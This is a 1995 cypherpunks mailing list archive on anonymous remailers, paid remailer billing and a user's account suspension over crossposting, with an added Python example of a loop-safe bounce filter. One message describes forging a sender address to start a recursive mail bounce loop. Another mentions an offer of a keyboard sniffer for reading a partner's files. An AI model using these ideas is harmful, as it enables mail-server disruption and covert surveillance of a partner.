forwarded.] 
-----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLw0G3CoZzwIn1bdtAQHTCQGAgs4itNl5sAZMFjgMIx4Gef52o49+4q3k m36gnACMfYDMThQyhcOS8udSMFw3YM4Q =uty3 -----END PGP SIGNATURE----- From lmccarth at ducie.cs.umass.edu Fri Jan 6 01:09:01 1995 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Fri, 6 Jan 95 01:09:01 PST Subject: sniff passwords on PC (DOS) Message-ID: <199501060914.EAA22804@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Mike writes: > days after his arrest, that the CIA had cracked Aldrich Aim's encrypted > files. (sorry if I spelled his name incorrectly.) FYI, I'm fairly sure it's "Aldrich Ames". > Think about it, the govt. could spend 50,000 to 100,000 to create a > freeware gif viewer, for example, that installed such a tsr. ...most of that going to Compu$erve/Uni$y$... > P.S. If the guy who wanted to see his gf's files writes me, I'll send you > this keyboard sniffer program. Just to clarify slightly, the person who originally asked the question (Adam Gerstein aka THE MAC GURU) said he had a _friend_ who wanted to see his (the friend's) gf's files. - - -L. Futplex McCarthy - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLw0I8mf7YYibNzjpAQEF/wP9GPKLX7KifBFRenzmbvsCdbOQ7Narlm8/ qiW/nSLRr7jZUtjAyhYM71eI9GsQbO6lADfV9ncoPIATNB/eJNCqa2O0cmNa67O/ KuUSQl0NQPiUQyevkLRldllEb9hSuTNeHyJZ4SFDpMbFrGYXX4Iu/w9RYcn9ssNS 29qFs0vNK30= =Z0ZM - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] 
-----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLw0J9ioZzwIn1bdtAQHXVgF8CVyuTHInzoYDUZmZZXwksIosAuiP4TSh pfZJLbRcoPPP9sJ63CTfnexZXenEzhLf =zrNo -----END PGP SIGNATURE----- From carolann at mm.com Fri Jan 6 01:21:47 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Fri, 6 Jan 95 01:21:47 PST Subject: We still don't have the mailbox. In-Reply-To: Message-ID: Thanks Doc. Wrote Phil Dubois, Zimmy's Lawyer. It's something I'll show you a copy of when I get back to playing "catch-up". Love Always, Carol Anne On Fri, 6 Jan 1995, Thaddeus Ozone wrote: > Carol, > I DL'd the whole thang. If it was world-readable, I've got it locked up on > my hard drive. I'll have to wait until I can get my hands on some 800k > disks, it takes up 1776k on my hard drive, but should fit on 2 - 800k's > once it gets transferred. I took the liberty of taking EVERYTHING that was > readable, including what was in the main directory. Talk to you over the > weekend. > Your pal, -doc- > > >I tried again, even from my pages. > >I do believe it's the local server that's gotta do the job. > >Anyway, I'm bookmarking all the links. > >And downloading all the pages. > >Will go ftp here in a minute. > > > >Love Always, > > > >Carol Anne > >more in about an hour. > > > From lmccarth at ducie.cs.umass.edu Fri Jan 6 02:05:21 1995 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Fri, 6 Jan 95 02:05:21 PST Subject: Chain letter bounced (fwd) Message-ID: <199501061011.FAA23248@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- A small advisory: since na166182 at anon.penet.fi is subscribed to the c'punks list, and anon.penet.fi attempts to filter out instances of Make Money Fast, any mention of "MAKE.MONEY.FAST" on the list will likely generate an autoreply like the one below. 
It appears that a copy of the MAKE.MONEY.FAST FAQ (there, I've said it again :) included in the autoreply will even trigger this mechanism, which is awfully ironic at best. At worst, this self-referential property seems liable to allow some nasty email feedback loops. Offhand it appears that a message with an address @anon.penet.fi (preferably forged) in the From: line, and "MAKE.MONEY.FAST" as the message body, would launch an automatic recursive bounce process as anon.penet.fi attempts to send itself a message it considers illegal. Presumably this would crash when the disk quota on some mail spool somewhere is exceeded. If the message was forged to come From: cypherpunks at toad.com or another list to which an anon.penet.fi user is subscribed, I imagine the list would have the dubious privilege of witnessing all the recursive bounce messages along the way. I'm not volunteering to try to write a better MMF-recognizer for a.p.f, though.... Forwarded message: > From daemon at anon.penet.fi Fri Jan 6 04:22:39 1995 > To: lmccarth at ducie.cs.umass.edu > Subject: Chain letter bounced > > You, lmccarth at ducie.cs.umass.edu, have sent a message that seems to contain yet another > copy of the infamous Make Money Fast chain letter. > > If you want to make a complaint, please send just the headers of the > message to admin at anon.penet.fi - albeit as the messages have been blocked > (as you can see), the message probably *didn't* go through anon.penet.fi > but was faked (using NNTP faking or something similar). > [...] > To: cypherpunks at toad.com > From: "L. McCarthy" [...] > Posting letters asking for $$$ is of course a risky venture on Usenet. We > see the PRZ Appeal as a Worthy Cause (tm), but that's just what all the > MAKE.MONEY.FAST posters think of their garbage too. If you go sticking out [...] -L. 
Futplex McCarthy - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLw0WJGf7YYibNzjpAQEfxAQAiA70W8v7saU4TU+0yJL4XC44uhV50Q34 rX5T1A1ADbPgKeIEX/nImyRP2h6T+V2GdYBWPMJjlVYV1Nyqpxb2kHToocQCbtjd ILyNYew0zHfpZAPeYYM4Y35ru1LoQeg9+COo9RElkS3daMB2gtUjmY2EtfPF6h4V tDei1OHtdl0= =vxjA - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLw0XKioZzwIn1bdtAQE2egF/Z5Tjg/dzt8cc/lkFXA/LMd17nNNGYv8N 7E7qlnWAhdz82+cILCVHmfVpHNIfdTUH =xtDg -----END PGP SIGNATURE----- From frissell at panix.com Fri Jan 6 03:23:19 1995 From: frissell at panix.com (Duncan Frissell) Date: Fri, 6 Jan 95 03:23:19 PST Subject: C'punks Economist Fan Club Message-ID: <199501061123.AA10001@panix.com> >It's witty, politically >aware, relatively technically savvy. The articles exhibit a healthy (IMHO) >cynicism about what happens and why, yet maintain some idealism about what >should happen. It's not perfect, but it's difficult to imagine surpassing it. The Economist is fully informed and funny. What domestic news magazine would include the following in one of *their* leads (editorials): Circa 1987 "It is unlikely that Gorbachev has included an invasion of Western Europe in his next Five Year Plan but his generals *have* made their preparations. Lucky Britain is in the *Polish* Army's Zone of Occupation." DCF -- Have you registered a domain today. My template worked first time and I have since registered nine domain names. Send for a free copy. 
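L. McCarthy's "Chain letter bounced" message above describes a filter whose autoreply carries the text that triggered it, so the reply can trigger the filter again. The following is an added example, not code from the list or from anon.penet.fi: a loop-safe version of such a filter, in which the domain anon.example, the daemon address, the function names and the one-notice-per-day limit are assumptions.

```python
"""Loop-safe bounce logic for a content filter that auto-replies (added example).

Assumptions, not taken from the list messages: the service domain
anon.example, the daemon address, and the one-notice-per-sender-per-day limit.
The header checks follow RFC 3834 (Auto-Submitted) and common Precedence usage.
"""
import re
from email import message_from_string
from email.message import EmailMessage
from email.utils import parseaddr

SERVICE_DOMAIN = "anon.example"          # hypothetical service domain
DAEMON_ADDR = "daemon@" + SERVICE_DOMAIN
# Matches "MAKE.MONEY.FAST", "Make Money Fast", "make_money_fast", ...
CHAIN_LETTER = re.compile(r"make[\s._-]*money[\s._-]*fast", re.IGNORECASE)
NOTICE_INTERVAL = 24 * 3600              # seconds between notices per sender


def is_chain_letter(msg):
    """True if the subject or any text part matches the filter pattern."""
    if CHAIN_LETTER.search(msg.get("Subject", "")):
        return True
    for part in msg.walk():
        if part.get_content_maintype() == "text":
            payload = part.get_payload(decode=True) or b""
            if CHAIN_LETTER.search(payload.decode("latin-1")):
                return True
    return False


def may_auto_reply(msg, envelope_sender):
    """Return (ok, reason); refuse whenever a reply could feed a loop."""
    if not envelope_sender or envelope_sender.strip() == "<>":
        return False, "null envelope sender (already a bounce)"
    if msg.get("Auto-Submitted", "no").strip().lower() != "no":
        return False, "Auto-Submitted header present"
    if msg.get("Precedence", "").strip().lower() in ("bulk", "junk", "list"):
        return False, "bulk or list traffic"
    local, _, domain = parseaddr(envelope_sender)[1].lower().rpartition("@")
    if domain == SERVICE_DOMAIN:
        return False, "sender is in our own domain"
    if local in ("daemon", "mailer-daemon", "postmaster"):
        return False, "sender is an automated address"
    return True, "ok"


def build_notice(msg, recipient):
    """Build the rejection notice. It quotes neither the body nor the subject
    of the blocked message, so it cannot match CHAIN_LETTER itself. It should
    be handed to the MTA with a null envelope sender (MAIL FROM:<>)."""
    notice = EmailMessage()
    notice["From"] = DAEMON_ADDR
    notice["To"] = recipient
    notice["Subject"] = "Message blocked by content filter"
    notice["Auto-Submitted"] = "auto-replied"
    notice["Precedence"] = "bulk"
    if msg.get("Message-ID"):
        notice["In-Reply-To"] = msg["Message-ID"]
    notice.set_content(
        "A message from this address was blocked by the chain-letter filter.\n"
        "Original Message-ID: %s\n" % msg.get("Message-ID", "(none)")
    )
    return notice


class NoticeLimiter:
    """Allow at most one notice per sender per NOTICE_INTERVAL seconds."""

    def __init__(self):
        self._last = {}

    def allow(self, sender, now):
        last = self._last.get(sender)
        if last is not None and now - last < NOTICE_INTERVAL:
            return False
        self._last[sender] = now
        return True


def handle(raw, envelope_sender, limiter, now):
    """Return (action, notice, reason); action is deliver, drop or bounce."""
    msg = message_from_string(raw)
    if not is_chain_letter(msg):
        return "deliver", None, "clean"
    ok, reason = may_auto_reply(msg, envelope_sender)
    if not ok:
        return "drop", None, reason
    sender = parseaddr(envelope_sender)[1].lower()
    if not limiter.allow(sender, now):
        return "drop", None, "notice already sent recently"
    return "bounce", build_notice(msg, sender), "ok"


# Constructed sample messages (not real traffic).
FIRST = ("From: user@site.example\nTo: an1234@anon.example\n"
         "Message-ID: <1@site.example>\nSubject: hello\n\n"
         "...just what all the MAKE.MONEY.FAST posters think too.\n")
FORGED = FIRST.replace("user@site.example", "an9@anon.example")
```

Because the notice never repeats the blocked text, it passes the filter if it is ever routed back through the service, and the per-sender limit bounds what a mailing list would see if its address were the one being notified.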
From frissell at panix.com Fri Jan 6 03:23:20 1995 From: frissell at panix.com (Duncan Frissell) Date: Fri, 6 Jan 95 03:23:20 PST Subject: True Names Message-ID: <199501061123.AA10015@panix.com> > >--Mike, still looking for a copy himself > Boy, for people who can make the World's Governments tremble with the click of a keyboard some of you seem a bit print disabled. How to buy an Out of Print Book (c) 1995 Offshore Enterprises 1) Find an OP book search specialist 2) Ask he/she to find it for you 3) Pay for it To accomplish 1), ask at (independent) bookstores in your vicinity (those are places you may have seen around town full of processed tree carcasses), libraries, etc. DCF -- Correlation between (40 years of pack-a-day)second-hand smoke and cancer: +1.19 Correlation between having had an abortion and cancer: +1.50 Correlation generally accepted as significant for disease studies: +3.00 From nsb at nsb.fv.com Fri Jan 6 04:28:54 1995 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Fri, 6 Jan 95 04:28:54 PST Subject: Remailer Abuse In-Reply-To: <4748.789282395.1@nsb.fv.com> Message-ID: Excerpts from mail: 5-Jan-95 Re: Remailer Abuse db at Tadpole.COM (1180*) > Heh. An anonymous remailer paid for by credit card... there'd > have to be an additional level of indirection for it to work, > which would make the methods for tracking those who don't pay > quite problematic. Again, this comes down to definitions of anonymity. In this case, if you start from the silly assumption that the anonymous remailer actually keeps records that correlate messages to payment mechanisms, Doug is right, but barely. To break the anonymity, you'd need collusion between the operator of the anonymous remailer AND First Virtual, because the former knows which account sent a message, and the latter knows who that account belongs to. 
(And before you tell me that this sounds a lot like the Clipper key escrow, I would point out that instead of two "trust us, they're independent" agencies of the US government, in this case we're talking about two independent private companies which are probably in two different countries. For my part, I figure that if the government of Finland and the government of the US can actually agree that it's so important to force the sacrifice of anonymity in a given case that they're both willing to coerce companies under their jurisdiction, they will probably have a very good reason for doing so. Maybe I'm too trusting, though.) Moreover, and perhaps most important, even THIS can only be done if the anonymous mailer keeps records of WHICH account paid for WHICH posting, and if I were to operate a for-pay remailer, I wouldn't do that anyway. It sort of defeats the whole point of the service. > Also, most remailer abuse tends to be of the hit-and-run variety, > which is still nicely enabled by FV. Only if you assume that the same people aren't responsible for multiple hit-and-run attacks. I would tend to assume the opposite. Russ Nelson saw the first point quite clearly, and wrote: Excerpts from mail: 5-Jan-95 Re: Remailer Abuse nelson at crynwr.com (1177) > Sure, I'll know who used it, but I'm not going to keep that > information. (Yes, yes, FV says that I have to keep records of who > bought what, but I'll label all my information with a random number, > that simply says that X bought information worth Y, not *what* > information.) And if you don't trust a remailer operator, then you > won't use it. All I'd add here is that the requirement to keep records is one that we have to pass on from the credit card world. If you didn't keep ANY records, my understanding is that all that this would really mean in practice is that there would be an extremely strong presumption AGAINST you in certain dispute-resolution situations. 
That's just my understanding, however, and it doesn't in any way supersede or supplement our legal terms and conditions, available from fineprint at fv.com. (You should try them, I find them more effective than Sominex.) Excerpts from mail: 5-Jan-95 Re: Remailer Abuse wcs at anchor.ho.att.com (2028) > I'd be worried about a couple of issues - > one is just the transaction cost - can you successfully market remailer use > at a buck a shot or whatever you'd be charging beyond FV's 29c stamp, > or would you have some convenient way to aggregate bill? Depending on how often you aggregate, you can charge almost any amount. 20 cents might be very reasonable. If you run a cron job once a month to post aggregated billings to anyone who had two or more outstanding uses, you'd make only a small amount on the two-time users, but you'd get serious aggregation from the regular users. (You might also want to bill the really-high-volume users weekly, to prevent them from going into shock at their huge monthly bills.) > Beyond that, though, are some traffic analysis problems - > remailers require a fair bit of traffic to be useful, and unless > you receive a reasonable amount of encrypted traffic, > and support encrypted email for purchasing remailer service > and other merchandise, an eavesdropper would have a fairly good source > of traffic data on your remailer users, especially since buying and using > remailer service requires two messages within an hour or so. Well, I think low-volume remailers are always a bit vulnerable to traffic analysis attacks, aren't they? One thing you could do is build a variable time-delay into the remailer, to make it harder to correlate messages coming in with those going out. To take paranoia a step further, you could allow people to encrypt their mail TO an anonymous remailer with the remailer's public key, and let the remailer send it out unencrypted. 
No snooper should be able to correlate the *contents* that way, and it avoids lots of key management problems by only using the remailer's key, not the user's. > An alternative billing mechanism, which wouldn't use Chaum-patented cash, > would be to sell a bunch of one-shot random-number tokens. > When you sell the tokens, you add them to the database of valid tokens, > and when one comes in on a message you delete it. > This allows you to sell more than one message or service-period per > FV transaction, and separates the purchase and use by a longer time, > without adding the need for record-keeping based on the user's ID. > It obviously does require encrypted reply messages. I think this could work quite nicely, at first glance. This is also the kind of service for which you might want to wait until after the "yes" reply to deliver the "goods". My only concern, would be the key management issues, but they might be manageable in this case by using the equivalent of a session key, instead of a permanent personal key. I think this is a promising idea. -- Nathaniel From rishab at dxm.ernet.in Fri Jan 6 06:06:39 1995 From: rishab at dxm.ernet.in (Rishab Aiyer Ghosh) Date: Fri, 6 Jan 95 06:06:39 PST Subject: PATNEWS: PTO accepting USENET FAQs are formal prior art In-Reply-To: <199501040304.AA01233@world.std.com> Message-ID: Thought I'd pass this on... -Rishab srctran at world.std.com (Gregory Aharonian) writes: > !010394 PTO accepting USENET FAQs as formal prior art > > It seems that the US Patent Office is accepting Internet USENET FAQs > (Frequently Asked Questions - periodic postings on USENET groups with > questions and answers) as prior art. As you see in the following entry > from my software prior art database, one of the Other References is to > a cryptography FAQ. If any knows if the European Patent Office is accepting > USENET FAQs, and has an example, let me know. 
> > Thus if an examiner objects to your use of a FAQ as prior art, cite > this patent (NTIPAFCAP*). It probably would be helpful if the PTO came out > with a quick guideline to a consistent way of doing so. I suppose archiving > FAQs is one more thing I can add to my databases. > > It's nice to see the PTO embracing part of the Internet, even as it > rejects other parts of the Internet. Eventually, though, the PTO will have > to choose one or the other. > > Greg Aharonian > Internet Patent News Service > (for subscription info, send 'help' to patents at world.std.com ) > (for prior art search services info, send 'prior' to patents at world.std.com ) > (for WWW patent searching, try http://sunsite.unc.edu/patents/intropat.html > ==================== > > TYP[USPAT] > NUM[5371794] > ASS[Sun Microsystems] > CUN[USX] > ISD[19941206] > CLS[380/21] > ART[222] > LOC[] > GRG[] > TIT[Method and apparatus for privacy and authentication in wireless networks] > ORF[5] > ORFTXT[ > Authentication and Authenticated Key Exchanges, Authors: Diffie, Oorschot & > Weiner, Published by Designs, Codes & Cryptography 2, 107-125, > .COPYRGT.1992 Kluwer Academic Publishers. > The First Ten Years Of Public Key Cryptography, Author: Whitfield Diffie, > Reprinted from Proceedings of the IEEE, vol. 76, No. 5, May 1988. > > Overview of Cryptology: Summary Of Internet Cryptology Frequently Asked > Questions (Oct. 1992). > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > > The Keys To Privacy and Authentication, Publication by RSA Data Security, > Inc., 100 Marine Parkway, Redwood City, Calif. 94065. (Oct. 1993). > Answers To Frequently Asked Questions About Today's Cryptography, Author: > Paul Fahn, RSA Laboratories, 100 Marine Parkway, Redwood City, Calif. 94065 > (Sep. 1992). > ] > > > ============================================================================= > > (NTIPAFCAP* = Not that issued patents are formally citable as precedent). 
----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From carolann at mm.com Fri Jan 6 06:40:49 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Fri, 6 Jan 95 06:40:49 PST Subject: C'punks Economist Fan Club In-Reply-To: <199501061123.AA10001@panix.com> Message-ID: This I hope shows I can keep my humor level a bit. How does "CENSORED.COM" sound? My original reply is still in suspended composition. On Fri, 6 Jan 1995, Duncan Frissell wrote: > Have you registered a domain today. My template worked first time and I > have since registered nine domain names. Send for a free copy. > From nesta at nesta.pr.mcs.net Fri Jan 6 07:02:07 1995 From: nesta at nesta.pr.mcs.net (Nesta Stubbs) Date: Fri, 6 Jan 95 07:02:07 PST Subject: All I did was properly crosspost! In-Reply-To: Message-ID: On Fri, 6 Jan 1995, Carol Anne Braddock wrote: > > I first saw the Dubois Letter in alt.security.pgp the 28th. > PRZ posted it here the next day. > > I "crossposted" it to my favorite 10 newsgroups. Just 10. > Some creep complained. (we'll get to him a bit later). > Ten is not a large number when it comes to cross-posting on some topics, I can think of at least twenty newsgroups where the PRZ letters and such would make a lot of sense and be on topic. This just goes to show the sometimes reactionary steps people take to control spamming. It leads to people getting hurt, especially when the sysop at your site is not intelligent enough to look at the article, and see whether or not it was cross-posted to valid groups etc., and not only that, but to completely pull your account for such a small thing (ten groups?
that's nothing in comparison to some articles out there still going) What is the name of the sysop at that site your account was pulled from? > But to take my account away for crossposting to 10 groups is not right. > I agree, ten groups is a small amount, especially if they are at least marginally on topic. This is something that we need to watch out for tho, it makes people fearful of spreading information, when even if you spread it in a nice manner, to on-topic groups etc., you face the chance of some bozo net-vigilante complaining to your sysop and having your account yanked. From the evidence here it seems the sysop acted in a reactionary manner, probably out of fear of some asshole mailbombing your account. I heartily recommend that those of you who do not know your site's policies for such become acquainted with them, or at least contact the sysop and talk about this issue. If you contact him and talk to him (her) about it then they are less likely to react so quickly and IMO stupidly. It's amazing how much just knowing your sysop's first name helps in such a situation. As for MCs, I am not sure of their policies but Karl is very reliable, and I doubt he would be so reactionary, in any case, I'll contact him about such policies. From MFROOMKI at umiami.ir.miami.edu Fri Jan 6 07:35:46 1995 From: MFROOMKI at umiami.ir.miami.edu (Michael Froomkin) Date: Fri, 6 Jan 95 07:35:46 PST Subject: Sorehand mailing list Message-ID: While I was abroad, someone from this list asked me for the address for the SOREHAND mailing list, which helps those suffering from repetitive strain injuries (RSI), including carpal tunnel syndrome. I didn't have the listserve info in England, and somehow lost the request before I got back.
Figuring, however, that cypherpunks write code, that writing code causes RSI, and hence this address might be of more general interest, here it is: to subscribe, send a SUBSCRIBE SOREHAND to Listserve at ucsfvm.ucsf.edu A.Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) U.Miami Law School | MFROOMKI at UMIAMI.IR.MIAMI.EDU PO Box 248087 | Coral Gables, FL 33146 USA | It's warmish here, almost cool. From carolann at mm.com Fri Jan 6 08:18:03 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Fri, 6 Jan 95 08:18:03 PST Subject: Sorehand mailing list In-Reply-To: Message-ID: Yes, Michael I might get SOREHAND having to rewrite all my HTML code. Thanks for the great tip. An ounce of prevention, is worth a pound of cure. Love Always, Carol Anne ps and here's the SOREHAND M/L address in case you trashed it. On Fri, 6 Jan 1995, Michael Froomkin wrote: > While I was abroad, someone from this list asked me for the address > for the SOREHAND mailing list, which helps those suffering from > repetitive strain injuries (RSI), including carpal tunnel syndrome. > I didn't have the listserve info in England, and somehow lost the request > before I got back. > > Figuring, however, that cypherpunks write code, that writing code causes > RSI, and hence this address might be of more general interest, here it is: > > to subscribe, send a SUBSCRIBE SOREHAND to > > Listserve at ucsfvm.ucsf.edu > > A.Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) > U.Miami Law School | MFROOMKI at UMIAMI.IR.MIAMI.EDU > PO Box 248087 | > Coral Gables, FL 33146 USA | It's warmish here, almost cool. > > From carolann at mm.com Fri Jan 6 08:43:15 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Fri, 6 Jan 95 08:43:15 PST Subject: Chain letter bounced (fwd) In-Reply-To: <199501061011.FAA23248@bb.hks.net> Message-ID: Thanks for the great article....I chuckled a lot, and I haven't had a lot to chuckle about these days..... 
But I still think that as the computer program we trust the most, he deserves overt support in all phases of my life. Even though I am dead broke, I could tell my main newsgroups. I wasn't asking or telling. Just informing. And it was to .1% of all Usenet ....That...is...not...a...lot! I am sure the real point of your post will come through, but for now I'm kinda clueless. Love always, Carol Anne On Fri, 6 Jan 1995, L. McCarthy wrote: > [...] > > To: cypherpunks at toad.com > > From: "L. McCarthy" > [...] > > Posting letters asking for $$$ is of course a risky venture on Usenet. We > > see the PRZ Appeal as a Worthy Cause (tm), but that's just what all the > > MAKE.MONEY.FAST posters think of their garbage too. If you go sticking out > [...] > > -L. Futplex McCarthy From dcwill at python.ee.unr.edu Fri Jan 6 08:51:10 1995 From: dcwill at python.ee.unr.edu (Dr. D.C. Williams) Date: Fri, 6 Jan 95 08:51:10 PST Subject: Remailer anonymity Message-ID: <199501061656.LAA26109@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Much has been said lately about maintaining anonymity for remailer users while providing some "pay to play" mechanism for the operator. Absent strong collusion between operators, doesn't remailer chaining ensure anonymity? Plenty of movie "bad guys" escape by getting on the subway because no one knows where they'll get off or change lines. It seems to me that knowing a person entered the system is far less information than knowing where they exited. As long as remailers have guaranteed access to other remailers, anonymity should be maintained. Re: collusion; I'd sooner believe the Macro$oft/RCC fable. In a gadda da vida, Billy. =D.C. Williams - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]
-----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLw12MioZzwIn1bdtAQH+XQF/RGe9sufCmL8KB2ARuyJNChmF+ZA4DRlf cCnAwpyUhRRtWdpDRx7wZxopjvPHUYDC =kVwM -----END PGP SIGNATURE----- From carolann at mm.com Fri Jan 6 09:26:14 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Fri, 6 Jan 95 09:26:14 PST Subject: Chain letter bounced (fwd) In-Reply-To: <199501061705.LAA04565@monad.armadillo.com> Message-ID: Inasmuch as I sent the prior posting the way I did, (as I can only read one letter at a time), You do not speak for all the cypherpunks, neither do I. On the time cronology you are the first to complain about the account closing notice. That doesn't constitute a WE yet. So please do not send me further personal mail. I'm glad I'm not so clueless about Stalking Laws in the State of Minnesota. Now I've go to my free.org account and get my Star-Trib address archive back. Carol Anne Braddock signed 1/6/95 11:25 A.M. On Fri, 6 Jan 1995, david d `zoo' zuhn wrote: > // come through, but for now I'm kinda clueless. > > Very very true. > > And please stop including this stuff at the end of every message. WE DON'T > CARE. > > > // From carolann at vortex.mm.com Fri Jan 6 01:39:29 1995 > // Date: Thu, 5 Jan 1995 21:57:05 -0600 > // From: Carol Anne Braddock > // To: carolann at vortex.mm.com > // > // [icicle.winternet.com] > // Login name: carolann In real life: CarolAnne Braddock > // Directory: /usr2/carolann Shell: /etc/scripts/tcsh-susp > // Last login Thu Jan 5 21:38 on ttyq5 from annex3-1.wintern > // New mail received Thu Jan 5 21:16:23 1995; > // unread since Mon Jan 2 13:18:25 1995 > // Plan: > // This account has been disabled permanently. > // > // Mike Horwath - Admin - Winternet - drechsau at winternet.com > // > > From carolann at mm.com Fri Jan 6 09:39:26 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Fri, 6 Jan 95 09:39:26 PST Subject: All I did was properly crosspost! 
In-Reply-To:
Message-ID:

On Fri, 6 Jan 1995, Nesta Stubbs wrote:

> On Fri, 6 Jan 1995, Carol Anne Braddock wrote:
> ten is not a large number when it comes to cross-posting on some topics, I
> can think of at least twenty newsgroups where the PRZ letters and such
> would make a lot of sense and be on topic. This just goes to show the
> sometimes reactionary steps people take to control spamming. it leads to
> people getting hurt, especially when the sysop at your site is not
> intelligent enough to look at the article, and see whether or not it was
> cross-posted to valid groups etc..and not only that, but to completely
> pull your account for such a small thing(ten groups? that's nothing in
> comparison to some articles out there still going) What is the name of the
> sysop at that site your account was pulled from?
> His name is Michael Horwath, root at winternet.com
> > But to take my account away for crossposting to 10 groups is not right.
> >
> I agree, ten groups is a small amount, especially if they are at least
> marginally on topic.
>
> This is something that we need to watch out for tho, it makes people
> fearful of spreading information, when even if you spread it in a nice
> manner, to on-topic groups etc.. that you face the chance of some bozo
> net-vigilante complaining to your sysop and having your account yanked.
> From the evidence here it seems the sysop acted in a reactionary manner,
> probably out of fear of some asshole mailbombing your account.
>
> I heartily recommend that those of you who do not know your site's
> policies for such, become acquainted with them, or at least contact the
> sysop and talk about this issue. If you contact him and talk to him(her)
> about it then they are less likely to react so quickly and IMO stupidly.
> It's amazing how much just knowing your sysop's first name helps in such a
> situation.
> > As for MCs, I am not sure of their policies but Karl is very reliable, > and I doubt he would be so reactionary, in any case, I'll contact him > about such policies. > > From carolann at mm.com Fri Jan 6 09:46:03 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Fri, 6 Jan 95 09:46:03 PST Subject: All I did was properly crosspost! harrassments another story In-Reply-To: <199501061733.LAA04744@monad.armadillo.com> Message-ID: On Fri, 6 Jan 1995, david d `zoo' zuhn wrote: > Sorry, but I don't flame in public fora. I do so in email only. > > The Michigan precedent for email stalking isn't very strong (it also > included several incidents of physical contact as well), so you threats are > not really too worrisome. The last time I checked with various folks about > the Minnesota laws, it's not exactly too clear on email (prosecution in the > situation in question was declined due to lack of confidence in > conviction), so again, I'm not very worried. > > But it doesn't matter since you've just entered my global kill files. > Anything you send to me won't be seen at all. Anywhere. Anyhow. News. > Mail. Etc. Plonk! > > And as a personal note, if your concept of 'dealing' involves making legal > threats at the first possible instance of disagreement, then I think you > need a new concept of 'dealing'. > > From anonymous-remailer at shell.portal.com Fri Jan 6 09:47:43 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Fri, 6 Jan 95 09:47:43 PST Subject: TRUE NAMES FOR FREE Message-ID: <199501061748.JAA12677@jobe.shell.portal.com> Angus Patterson wrote a short while ago: S6>I've been trying to get True Names by Vernor Vinge, and have been told it's >out of print (like most good cypunk ), does anybody have it scanned? Laissez Faire Books has a stockpile and they're giving them away! LF sends you _True_Names_ free when you buy _Solomon's Knife_ by Victor Korman (a pen-name). 
Order FN5136, $9.95 for both + $3.25 shipping: Laissez Faire, 938 Howard Street #202, San Francisco, CA 94103, tel 800-326-0996, fax 415-541-0597. They have their own Laissez Faire Book News list, too, with previews and samples. Ask Chris Whitten for more info at . "Capt'n Bob" Correspondents: Communications went down recently when 2 remailers shut up shop. A new address will be up and running during next week. From carolann at mm.com Fri Jan 6 10:03:17 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Fri, 6 Jan 95 10:03:17 PST Subject: Your HomePage at winternet.com In-Reply-To: <199501061739.AA29180@xs1.xs4all.nl> Message-ID: Dear Alex, We have all the web pages. They should be moving to spring.com shortly. It's kinda sad that they bootleg off my net.web.goodwill, as My pages are are at the 200+ access count and rising level per day. The Webbittown pages will remedy this in the not too distant future. (PGP encoded HTML) They should be down by the end of the day. Love Always, Carol Anne > -- > Alex de Joode > usura at replay.com Hate mail appreciated, > http://www.xs4all.nl/~usura weekly contest for best death threat. > > > From carolann at mm.com Fri Jan 6 10:14:39 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Fri, 6 Jan 95 10:14:39 PST Subject: Guess what I just got In the mail? giggle..giggle Message-ID: ---------- Forwarded message ---------- Date: Fri, 6 Jan 95 18:57:36 +0200 From:daemon at anon.penet.fi To: carolann at mm.com Subject: Chain letter bounced You, carolann at mm.com, have sent a message that seems to contain yet another copy of the infamous Make Money Fast chain letter. If you want to make a complaint, please send just the headers of the message to admin at anon.penet.fi - albeit as the messages have been blocked (as you can see), the message probably *didn't* go through anon.penet.fi but was faked (using NNTP faking or something similar). 
